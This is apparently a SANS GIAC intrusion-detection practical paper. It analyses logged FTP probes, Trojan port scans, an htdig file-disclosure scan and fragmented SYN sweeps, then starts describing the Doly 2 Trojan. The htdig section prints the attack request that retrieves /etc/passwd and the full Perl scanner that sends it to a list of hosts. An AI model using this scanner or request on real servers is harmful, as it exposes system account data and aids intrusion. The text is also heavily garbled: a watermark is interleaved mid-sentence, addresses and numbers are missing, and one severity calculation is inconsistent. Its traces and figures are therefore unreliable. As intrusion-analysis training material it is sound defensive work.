Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Size: px
Start display at page:

Download "Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights"

Transcription

1 Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without express written permission. Interested in learning more? Check out the list of upcoming events offering "Intrusion Detection In-Depth (Security 503)" at

2 SANS GIAC Intrusion Detection Curriculum Parliament Hill 2000 Assignment 1 Detect 1 Aug 27 11:12:26 seeker tcplogd: "Syn probe" super.biat.ch [ ]:[3368]->seeker[ ]:ftp 1. Source of trace My network. 2. Detect was generated by: UNIX TCPLog. 3. Probability the source address was spoofed It is highly probable this address was spoofed. A TCP connection was initiated to a high port (5001) in order to observe the returned reset Time-To-Live (TTL). In this case the TTL returned is 239 and the TTL intercepted by Snort was 26. seeker:~# tcpdump -v -n ip and host tcpdump: listening on eth0 15:09: > : S : (0) win <mss 1460,sackOK,timestamp [ tcp]> (DF) [tos 0x10] (ttl 64, id 22794) 15:09: > : R 0:0(0) ack win 0 [tos 0x10] (ttl 239, id 7138) Other indications it is spoofed is the original SYN-FIN packet has a TTL of 26 with a window size of 1028: 11:12: > : SF : (0) win 1028 (ttl 26, id 39426) A second SYN packet has a TTL of 48 with a window size of 32120: 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32630) Key These fingerprint two concurrent = AF19 connections FA27 2F94 have 998D different FDB5 DE3D flags, TTL, F8B5 packet 06E4 A169 ID #, and 4E46 window size which clearly shows that two different hosts are involved. The first trace shows a WIN size of 1028 with a TTL of 26 and a packet ID of This trace doesn't contain enough information to accurately determine the type of OS used. Guy Bruneau Page 1 of 1

3 However, the second trace shows a WIN size of with a TTL of 48 and a packet ID By applying passive OS Fingerprinting to the second trace using the information from the configuration file of the p0f tool ( we can determine with accuracy that this computer is probably running some flavor of Linux. 4. Description of attack: The probes are against TCP port 21 (FTP), and in this case the source is probably trying to create a buffer overflow. Note that the source and destination of the initial probe are the same indicating crafted packets. The most likely CVE is a candidate under review known as CAN "wu-ftpd FTP daemon allows any user and password combination". 5. Attack mechanism: The purpose of this scan is to determine the presence and availability of the FTP service, which would be preparatory to an attack on FTP. 6. Correlation: The following correlating data is included, providing a complete picture of the activity initially detected by TCPLogd daemon. UNIX Snort Syslog alert Aug 27 11:12:21 seeker snort[11207]: spp_portscan: PORTSCAN DETECTED from (STEALTH) Aug 27 11:12:21 seeker snort[11207]: SCAN-SYN FIN: :21 -> :21 Aug 27 11:14:05 seeker snort[11207]: spp_portscan: portscan status from : 2 connections across 1 hosts: TCP(2), UDP(0) STEALTH Aug 27 11:15:56 seeker snort[11207]: spp_portscan: End of portscan from : TOTAL time(0s) hosts(1) TCP(2) UDP(0) STEALTH SNORT Portscan Aug 27 11:12: :21 -> :21 SYNFIN **SF**** Aug 27 11:12: :3368 -> :21 SYN **S***** SNORT packet dump [**] SCAN-SYN FIN [**] 08/27-11:12: :21 -> :21 TCP TTL:26 TOS:0x0 ID:39426 **SF**** Seq: 0x2B3B7BD2 Ack: 0x39753B5E Win: 0x404 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Guy Bruneau Page 2 of 1

4 Someone else blocked it later with IPChains Aug 27 11:22:17 elvisman kernel: Packet log: input DENY eth0 PROTO= : :21 L=40 S=0x00 I=39426 F=0x0000 T=27 SYN Shadow log dump using asctcpdump filter Initial SYN-FIN probe (note TTL & packet ID). Note the source and destination ports. 11:12: > : SF : (0) win 1028 (ttl 26, id 39426) a a06 81a5 d1cc 15f9 E..(... c0a8 1e b3b 7bd b5e.p...+;{.9u;^ aaa P... Initial Key response fingerprint from = AF19 SYN-FIN FA27 2F94 probe 998D with FDB5 a SYN-ACK DE3D F8B5 06E4 A169 4E46 11:12: > : S : (0) ack win <mss 536> (DF) (ttl 64, id 43794) c ab a91 c0a8 1e01 E..,..@.@...p.. d1cc 15f c b3b 7bd3...).9+;{ ed0 0f1f `.>... This is a reset from the real host verified earlier (note TTL & different packet ID) 11:12: > : R : (0) win 0 (ttl 239, id 32627) f ef06 c733 d1cc 15f9 E..(.s c0a8 1e b3b 7bd p...+;{ f P... This is a second attempt (SYN only) from a different host most likely the real source (note TTL & different packet ID). Note the source and destination ports. 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32630) c 7f d d1cc 15f9 E..<.v@.0.F... c0a8 1e01 0d e4 a62e p...(..(... a002 7d78 da9d b a..}x s... 11:12: > : S : (0) ack win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 64, id 43795) c ab a80 c0a8 1e01 E..<..@.@...p.. d1cc 15f d28 0c50 e858 28e4 a62f...(.p.x(../ a012 3ebc b a..>..S f 091e /...s... Authorization service check 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 64, id 43807) c ab1f a74 c0a8 1e01 E..<..@.@..t.p.. d1cc 15f9 0b d44 a c.q.D.Q... a002 3ebc b75a b a..>..Z... Key 072f fingerprint 0b2f 0000 = AF FA F94 998D FDB5././... DE3D F8B5 06E4 A169 4E46 Guy Bruneau Page 3 of 1

5 11:12: > : S : (0) ack win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32767) c 7fff d1cc 15f9 E..<..@.0.E... c0a8 1e b63 292e 0b29 0d44 a152.p...q.c)..).d.r a012 7d78 b3a b a..}x f 072f 0b2f /./... Port verification and exchange 11:12: > : P 1:10(9) ack 1 win <nop,nop,timestamp > (DF) (ttl 64, id 43809) d ab a71 c0a8 1e01 E..=.!@.@..q.p.. d1cc 15f9 0b d44 a e 0b2a...c.q.D.R)..* ebc 505c a 072f 0b3a..>.P\.../.: f c32 310d 0a ,21.. Indication the user is working from a root account 11:12: > : P 1:35(34) ack 10 win <nop,nop,timestamp > (DF) (ttl 48, id 32769) d1cc 15f9 E..V..@.0.Ex... c0a8 1e b63 292e 0b2a 0d44 a15b.p...q.c)..*.d.[ d78 ffdc a b..}x f 0b3a c a20./.:3368, 21 : a 204f a USERID : OTHER : 726f 6f74 0d0a root.. 11:12: > : F 10:10(0) ack 35 win <nop,nop,timestamp > (DF) (ttl 64, id 43811) ab a78 c0a8 1e01 E..4.#@.@..x.p.. d1cc 15f9 0b d44 a15b 292e 0b4c...c.q.D.[)..L ebc 20d a 072f 0b47..>..../.G b... 11:12: > : F 35:35(0) ack 11 win <nop,nop,timestamp > (DF) (ttl 48, id 32771) d1cc 15f9 E..4..@.0.E... c0a8 1e b63 292e 0b4c 0d44 a15c.p...q.c)..l.d.\ d78 e a a9..}x f 0b47./.G 11:12: > : F 1:1(0) ack 1 win <nop,nop,timestamp > (DF) (ttl 48, id 32873) d1cc 15f9 E..4.i@.0.E2... c0a8 1e01 0d e4 a62f 0c50 e859.p...(..(../.p.y d a a67..}x.g...g 072f 091e./.. 11:12: > : F 1:1(0) ack 2 win <nop,nop,timestamp > (DF) (ttl 64, id 43815) ab a74 c0a8 1e01 E..4.'@.@..t.p.. d1cc 15f d28 0c50 e859 28e4 a630...(.p.y( ebc 3b a 072f 0d3c..>.;.../.< a67...g 7. Evidence of active targeting: Key It doesn't fingerprint appear = to AF19 be active FA27 targeting. 2F94 998D The FDB5 probes DE3D appear F8B5 to be 06E4 random A169 (packet 4E46 ID # not consistent), however, the attacker appears to be trying different methods to gain information. Initially using a SYN-FIN packet, upon the receipt of a SYN-ACK, another SYN packet is sent which appears to be a different host, (see TTL) using the same IP to Guy Bruneau Page 4 of 1

6 connect to the FTP server thus appearing like a legitimate user. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (4 + 5) - (5 + 3) = 1 System criticality: 4 - FTP service running Attack lethality: 5 - The goal is to probably create a buffer overflow to gain root access System countermeasures: 5 - All patches have been applied and TCP wrapper is installed Network Countermeasures: 3 - Permissive firewall but relying on TCP wrapper for Key controlled fingerprint access. = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 9. Defensive recommendation: Defenses are fine, attack was blocked by TCP wrapper limiting access to a few IPs. The system is also protected with multiple layers of Intrusion Detection Systems. Insuring that the patches are kept up-to-date is also a must to provide a stable FTP service. 10. Write a question that is based on the trace and your analysis with your answer. 11:12: > : SF : (0) win 1028 (ttl 26, id 39426) a a06 81a5 d1cc 15f9 E..(... c0a8 1e b3b 7bd b5e.p...+;{.9u;^ aaa P... 11:12: > : S : (0) ack win <mss 536> (DF) (ttl 64, id 43794) c ab a91 c0a8 1e01 E..,..@.@...p.. d1cc 15f c b3b 7bd3...).9+;{ ed0 0f1f `.>... 11:12: > : R : (0) win 0 (ttl 239, id 32627) f ef06 c733 d1cc 15f9 E..(.s c0a8 1e b3b 7bd p...+;{ f P... 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32630) c 7f d d1cc 15f9 E..<.v@.0.F... c0a8 1e01 0d e4 a62e p...(..(... a002 7d78 da9d b a..}x s... Using the following traces, what is the most accurate answer? Key a) A denied fingerprint connection = AF19 to FA27 a FTP 2F94 server 998D FDB5 DE3D F8B5 06E4 A169 4E46 b) A spoofed address attempting to connect to server c) A SYN-FIN probe to a FTP server followed by normal SYN connection. Indication of a spoofed address. Guy Bruneau Page 5 of 1

7 d) A SYN-FIN probe to a FTP server Answer: C Detect 2 Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26231 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26233 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26235 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26236 F=0x4000 T=61 SYN (#57) Aug Key 1 13:49:04 fingerprint seeker = AF19 kernel: FA27 Packet 2F94 log: 998D inp FDB5 DENY eth0 DE3D PROTO=6 F8B : E4 A169 4E :12346 L=60 S=0x00 I=26237 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker tcplogd: "Syn probe" [ ]:[2461]- >seeker[ ]:[20034] Aug 1 13:49:04 seeker tcplogd: "Syn probe" [ ]:[2463]- >seeker[ ]:[31337] Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26239 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26240 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26241 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26242 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26243 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26244 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26245 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26246 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26247 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26248 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26249 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26250 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26251 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26252 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26253 F=0x4000 T=61 SYN (#54) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26254 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26255 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26256 F=0x4000 T=61 SYN (#53) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26257 F=0x4000 T=61 SYN (#59) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26258 F=0x4000 T=61 SYN (#54) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26259 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= :2488 Guy Bruneau Page 6 of 1

8 :12345 L=60 S=0x00 I=26260 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26261 F=0x4000 T=61 SYN (#53) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26262 F=0x4000 T=61 SYN (#59) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26263 F=0x4000 T=61 SYN (#54) 1. Source of trace My network. 2. Detect was generated by: UNIX TCPLog and Linux IPChains firewall. A breakdown of the IPChains firewall log can be found at: 3. Probability the source address was spoofed This address is the true source. A TCP connection was initiated to a high port (5001) in order to observe the returned reset TTL. In this case the TTL returned is 58 and the TTL intercepted by Shadow is 61 (see section 6 for correlation). This minor difference between the TTL's is too insignificant, therefore could be a result of asymmetric routing. tcpdump -v -n ip and host tcpdump: listening on eth0 21:01: > : S : (0) win <mss 1460,sackO K,timestamp [ tcp]> (DF) [tos 0x10] (ttl 64, id 58909) 21:01: > : R 0:0(0) ack win 0 (DF) [tos 0x10] (ttl 58, id 51503) 4. Description of attack: This series of probes are targeting well-known Trojan ports. CVE candidate CAN is under review to represent hacker utilities or Trojan Horses when they are installed on a system, e.g. NetBus, Back Orifice, Rootkit, etc. 5. Attack mechanism: At 13:48:51 the scanner proceeded with a ping reconnaissance to assess availability of the Key target fingerprint which is followed = AF19 FA27 at 13:49:04 2F94 998D (13 seconds FDB5 later) DE3D by F8B5 the scan 06E4 probing A169 4E46 for 7 well known Trojans. Guy Bruneau Page 7 of 1

9 The Trojans probes are as follows: Port Description 1243 SubSeven 666 Attack FTP NetBus NetBus NetBus Pro SubSeven Netpatch 6. Correlation: The following data is included to correlate the activity initially detected by IPChains firewall and the TCPLog daemon. Snort lightweights IDS and Shadow confirmed the Trojan scan against the Seeker site. In this first instance, Snort only detects a ping request but doesn't detect any port connections. Most of Snort's rules are built to alarm only after the Trojan scanner actually connects with a server. However, Shadow shows that a ping request (reconnaissance) was initiated 13 seconds before the actual port probes, followed by a wide spectrum sweep of this network. Snort log Aug 1 13:48:51 seeker snort[18247]: IDS162 - PING Nmap2.36BETA: > Guy Bruneau Page 8 of 1

10 Shadow logs 7. Evidence of active targeting: The only evidence of possible active targeting is that the source port numbers are going up one at the time therefore indicating it can only scan one host at a time. This could possibly mean a search for active Trojans throughout the whole class C. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (5 + 1) + (5 + 5) = - 4 System criticality: 5 - Firewall Attack lethality: 1 - Attack is very unlikely to succeed System countermeasures: 5 - Modern operating system (Linux) Network Countermeasures: 5 - Restrictive firewall against well known Trojans 9. Defensive Key fingerprint recommendation: = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 Defenses are fine. Attack was blocked by the firewall and a Shadow Intrusion Detection System is in place to collect the traffic for further analysis. Guy Bruneau Page 9 of 1

11 The server being probed is using Linux as Operating System (OS) and remains unaffected by the Trojans it is probing for. 10. Write a question that is based on the trace and your analysis with your answer. Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26231 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26233 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26235 F=0x4000 T=61 SYN (#53) Aug Key 1 13:49:04 fingerprint seeker = AF19 kernel: FA27 Packet 2F94 log: 998D inp DENY FDB5 DE3D eth0 PROTO=6 F8B5 06E :2465 A169 4E :12345 L=60 S=0x00 I=26236 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26237 F=0x4000 T=61 SYN (#57) In the following trace, which of the following Internet protocol is being targeted? a) TCP b) IGMP c) UDP d) ICMP Answer: A Detect 3 Name Sev Src Addr Dst Addr SrcPt DstPt Date Count SigID SubSig Details www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:07: /etc/passwd [...] Random scanning of addresses mostly in subnet 1. Source of trace Work 2. Detect was generated by: Cisco Secure IDS. More information is available for this signature at: Guy Bruneau Page 10 of 1

12 3. Probability the source address was spoofed The address wasn't spoofed. This was later confirmed by the ISP. 4. Description of attack: This attack scans web servers for cgi-bin /etc/passwd exposure using an old HTDIG vulnerability. CVE was assigned to this HTDIG problem. 5. Attack mechanism: The computer involved ( ) was a Linux server with kernel It had been used by a cracker to scan a large number of addresses. The perl script used was "ht.pl" Key and it fingerprint tried to exploit = AF19 a bug FA27 in an 2F94 old 998D HTDIG FDB5 version DE3D to obtain F8B5 06E4 the file A169 "/etc/passwd" 4E46 from a list of IPs. The attack worked by sending an http get command to a web server hoping to retrieve information that would be otherwise restricted to the htsearch engine. In this case, if the target system stored encrypted passwords in the passwd file rather than a shadow file, retrieving this file would allow the cracker to attempt to decrypt the passwords remotely with a tool such as crack 5. However, if the passwords were stored in a shadow file, the /etc/passwd file would still hold valuable reconnaissance information by providing a list of active users and dormant accounts on the target. The following information was supplied by the ISP. The perl script process doesn't appear with the "ps" command. It would indicate the "ps" binary was cracked. The perl script, and all related files were located in "/usr/bin/. " (dot-dot-space), and "ls -a" doesn t show either. So, "ls" binary was only 140 KB, which confirms the presence of a rootkit on the server. He couldn t confirm how the cracker had gained root privilege to install the rootkit but could confirm the rootkit had been in place for about two months. The way htsearch works Htdig retrieves HTML documents using the HTTP protocol and gathers information from these documents which can later be used to search these documents. This program can be referred to as the search robot.. 1 However, htsearch is the actual search engine of the ht://dig search system. It is a CGI program that is expected to be invoked from an HTML form. It will accept both the GET and POST methods of passing data to the CGI program. 1 Here is how the CVE board has described it The htdig (ht://dig) CGI program htsearch allows remote attackers to read arbitrary files by enclosing the file name with backticks (`) in parameters to htsearch Correlation: Here we have a copy of the script used to randomly scan the class C Using the Cisco Secure IDS log, we have a readout of the actual traffic obtained by the IDS (Hex dump). Included below is a copy of the perl script (ht.pl) used to perform the scan. Guy Bruneau Page 11 of 1

13 This htdig vulnerability was also mentioned in the following security lists: BUGTRAQ: ht://dig remote information exposure FREEBSD:FreeBSD-SA-00:06 DEBIAN: remote users can read files with webserver uid TURBO:TLSA This vulnerability is also listed on SANS' "Top 10" list, under number 2: "Vulnerable CGI programs and application extensions installed on web servers." at Here is a Cisco Secure IDS breakout of the HEX dump 4, ,2000/06/25,15:16:44,2000/06/25,11:16:44,10008,6,5000,OUT,IN,4,3201,1,TCP/IP, , ,5902,80, ,/etc/passwd,get /cgi-bin/htsearch?exclude=%60etc/passwd%60 HTTP/1.0 host: user-agent: mozzilla/4.0 (compatible; MSIE 4.01; Windows 98) Here is a copy of the perl script used to conduct the scan (provided by the ISP) #/usr/bin/perl use LWP::UserAgent; my $ListFile = ""; print "HTDIG Scanner V1.0 by Y2K, y2k\@rootaccess.de\n\n"; print "Enter URL List File : "; #$ListFile = <STDIN>; $ListFile = "192.ip"; if($listfile =~ /\n/) { chop($listfile); } print "\n"; if (!open (URLS,"<$ListFile")) { print "File not found!\n"; exit(1); } $ua = new LWP::UserAgent; $ua->agent("mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"); $ua->timeout(1); while Key (<URLS>) fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 { $IP = $_; if($ip =~ /\n/) { chop($ip); } Guy Bruneau Page 12 of 1

14 print $IP,"..."; $req = new 'GET' => " $erg = $ua->request($req)->as_string; if ($erg =~ /Could not connect/) { print "Cannot connect to host on Port 80.\n"; } elsif (!($erg =~ /200 OK/)) { print "Error in HTTP request.\n"; } else { print "HTTP request ok...saving file.\n"; open(file, ">$IP"); print FILE $erg; close(file); } } close(file); 7. Evidence of active targeting: There is evidence of active targeting. By looking closely at the ht.pl script in item 6, you will notice the variable $ListFile = "192.ip"; which could indicate a previous network reconnaissance by the attacker. When the script was run against the class C, the attacker already had a file containing a list of addresses he was interested in probing. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (5 + 5) - (5 + 4) = 1 System criticality: 5 - Web Servers Attack lethality: 5 - If successful, attacker could gain root access. System countermeasures: 5 - Modern operation system with all the patches applied Network Countermeasures: 4 - Modern Intrusion Detection Systems and restriction at the router. 9. Defensive recommendation: Defenses were fine because the attack was ineffective (htdig isn't used) and was detected by multiple layers of Intrusion Detection Systems. 10. Write a question that is based on the trace and your analysis with your answer. Name Sev Src Addr Dst Addr SrcPt DstPt Date Count SigID SubSig Details www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:16: /etc/passwd On which Operating System (OS) will you find an /etc/passwd file? Guy Bruneau Page 13 of 1

15 a) Windows NT 4.0 b) MacOS c) Windows Millennium (ME) d) Solaris Answer: D Detect 4 Name Sev Src Addr Dst Addr SrcPt DstPt Date Count SigID SubSig Details IP Fragment Attack Fri Sep 8 07:41: TCP FRAG SYN Port Sweep Fri Sep 8 07:41: Source of trace Work 2. Detect was generated by: Cisco Secure IDS. More information is available for this signature at: 3. Probability the source address was spoofed There is no indication this address was spoofed. Further analysis concludes it was the true source. 4. Description of attack: The fragmentation of TCP packets allows for the communication of malicious code or remote commands, which could not be deciphered without reassembling the fragments. This technique is used to bypass Intrusion Detection Systems (IDS) or a certain number of firewalls. In order to perform a complete analysis of these fragmented packets, an IDS such as Shadow is needed to examine the payload. Different implementations take different approaches in deciding when it is safe to use large datagrams. However, 576 bytes is a "safe" size, which every implementation must support. 5. Attack mechanism: When IP packets are broken into fragments, only the first packet contains complete header information. Many routers will filter packets based on this header information. Guy Bruneau Page 14 of 1

16 Because there is not enough information in the secondary fragments, many routers let the packets through. Packets can be written and fragmented so that they can be successfully reassembled at the destination without the initial fragment. ull rig ht s. In this case we have a complete IP header and the "tool" is creating a significant numbers of SYN fragments in order to bypass the Intrusion Detection System and the firewall. The technique could eventually overwhelm the target and crash it if not properly patched and configured. The fragmented packets displayed here are truncated at byte 16. tai ns f The tool used in this attack was probably Nmap. or re 6. Correlation: The following is an extract from Shadow logs that which correlates the information collected by the Cisco Secure IDS. th ASCTcpdump replay of some of the packets SA NS In sti tu te , Au 07:42: truncated-tcp 16 (frag 42744:16@0+) (ttl 36) a6f bb c0a8 a3a6 E..$...$.d..p.. c0a8 df9e ce13 05e a k...a! P... 07:42: truncated-tcp 16 (frag 38451:16@0+) (ttl 36) c0a8 a3a6 E..$.3.$.u..p.. c0a8 df9e ce13 054f a k...O.a! P... 07:42: > : icmp: ip reassembly time exceeded [tos 0xc0] (ttl 64, id 50685) 45c c5fd c0a8 df02 E..T...@.Ig.k.. c0a8 a3a6 0b01 abb p...E..$ c6c ef c0a8 a3a6 c0a8 df9e...$.d..p...k.. ce12 05b6 391d e b...P :42: > : icmp: ip reassembly time exceeded [tos 0xc0] (ttl 64, id 50686) 45c c5fe c0a8 df02 E..T...@.If.k.. c0a8 a3a6 0b01 a p...v...E..$ b d c0a8 a3a6 c0a8 df9e.&.$.s..p...k.. ce d e b...P s The following data was replayed through Snort to correlates the fragmentation attacks. Snort rules used in the detect: Key icmp fingerprint = AF19 FA27 998D FDB5 DE3D 06E4 A169 4E alert any any <> any any 2F94 (msg:"ping-icmp Time F8B5 Exceeded"; itype:11;) A simple description of "Time Exceeded" could be described as if a host reassembling a Guy Bruneau SANS Institute Page 15 of 1 As part of GIAC practical repository. Author retains full rights.

17 fragmented datagram cannot complete the reassembly due to missing fragments within its time limit, it discards the datagram, and it may send a time exceeded message. 2 - preprocessor minfrag: 128 The minfrag preprocessor plugin checks for fragmented packets. If the packet is a fragment and its size is less than or equal to the threshold value, it generates the following alert: Tiny Fragments - Possible Hostile Activity. In this example, the minfrag preprocessor will generate an alert on all fragments of 128 bytes or less. Snort Alert log [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:42744 MF Frag Offset: 0x0 Frag Size: 0x10 [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:38451 MF Frag Offset: 0x0 Frag Size: 0x10 [**] PING-ICMP Time Exceeded [**] 09/08-07:42: > ICMP TTL:64 TOS:0xC0 ID:50685 TTL EXCEEDED [**] PING-ICMP Time Exceeded [**] 09/08-07:42: > ICMP TTL:64 TOS:0xC0 ID:50686 TTL EXCEEDED Snort - Application Layer Dump =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:42744 MF Frag Offset: 0x0 Frag Size: 0x10 CE E A a!...P... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:38451 MF Frag Key Offset: fingerprint 0x0 = AF19 Frag FA27 Size: 2F940x10 998D FDB5 DE3D F8B5 06E4 A169 4E46 CE F A O.a!...P... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Guy Bruneau Page 16 of 1

18 7. Evidence of active targeting: This attack was directed to a specific host ( ). The host sent over 100 fragments over a period of 4 minutes to in the class C. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (5 + 4) - (5 + 3) = 1 System criticality: 5 - Firewall Attack lethality: 4 - Could result in a complete Denial of Service (DoS) System countermeasures: 5 - Modern operating system, all patches applied Network Countermeasures: 3 - Restrictive firewall and modern IDS. 9. Defensive recommendation: Defenses were fine because the host rejected all packets. Multiple layers of Intrusion Detection Systems also detected it. For fragmented packets coming from outside this network, we may want to consider discarding them at the router. 10. Write a question that is based on the trace and your analysis with your answer. 07:42: truncated-tcp 16 (frag 42744:16@0+) (ttl 36) a6f bb c0a8 a3a6 E..$...$.d..p.. c0a8 df9e ce13 05e a k...a! P... Using the following trace, which of the following answers is the source address in Hex format? a) 64bb c0a8 b) c0a8 df9e c) c0a8 a3a6 d) bb Answer: c Assignment 2 - Evaluate an Attack 1. This Trojan can be downloaded at: 2. Description on how it works Guy Bruneau Page 17 of 1

19 When the Doly 2 scanner is unleash on a network, it will attempt to connect to the following ports in the following order: 3456, 4567, 5678, 6789, 7890, 9182, 8374, 2345, 7654 and (4 times each). However, if a computer is infected with the Trojan (server installed), it attempts to connect to the same ports in the same order: 3456, 4567, 5678, and connects on The default port for Doly 2 is It is also interesting to note the scanner looks for so many ports. Observe the port's increment order. It is possible to assume it may be a way to fool Intrusion Detection tools or the analyst by raising the noise floor with a bunch of random ports. This is quite a change from the previous version, which used a different set of ports. The previous versions used the following default ports: version 1.1 & 1.2 = 1011, version 1.5 = 1015, version 1.6 & 1.7 = 1016, version 1.35 = 1035 ( In order to install the Trojan correctly on the target, the following two files must be installed: msvbvm60.dll can be downloaded at: a required dll for programs written in Visual Basic 6.0. This information provides an excellent clue that the Trojan was probably written in Visual Basic with version 6.0. The second file needed to complete the installation is mswinsck.ocx. It can be downloaded at: If those two files are required and not installed by default on Windows 95 and Windows 98, it indicates the chances for this Trojan to be successfully installed are very low. The file msvbvm60.zip is 731KB and file mswinsck.ocx is 108KB. If both were package with the server (106KB) it would increase the chances of being discovered over , the most common way of distributing Trojans. When you look over the TCPDump traces, note the four attempts to connect to the server are done for every port until a connection is established. This is the readme file included with the final release Doly v2 Beta General stuff you need to 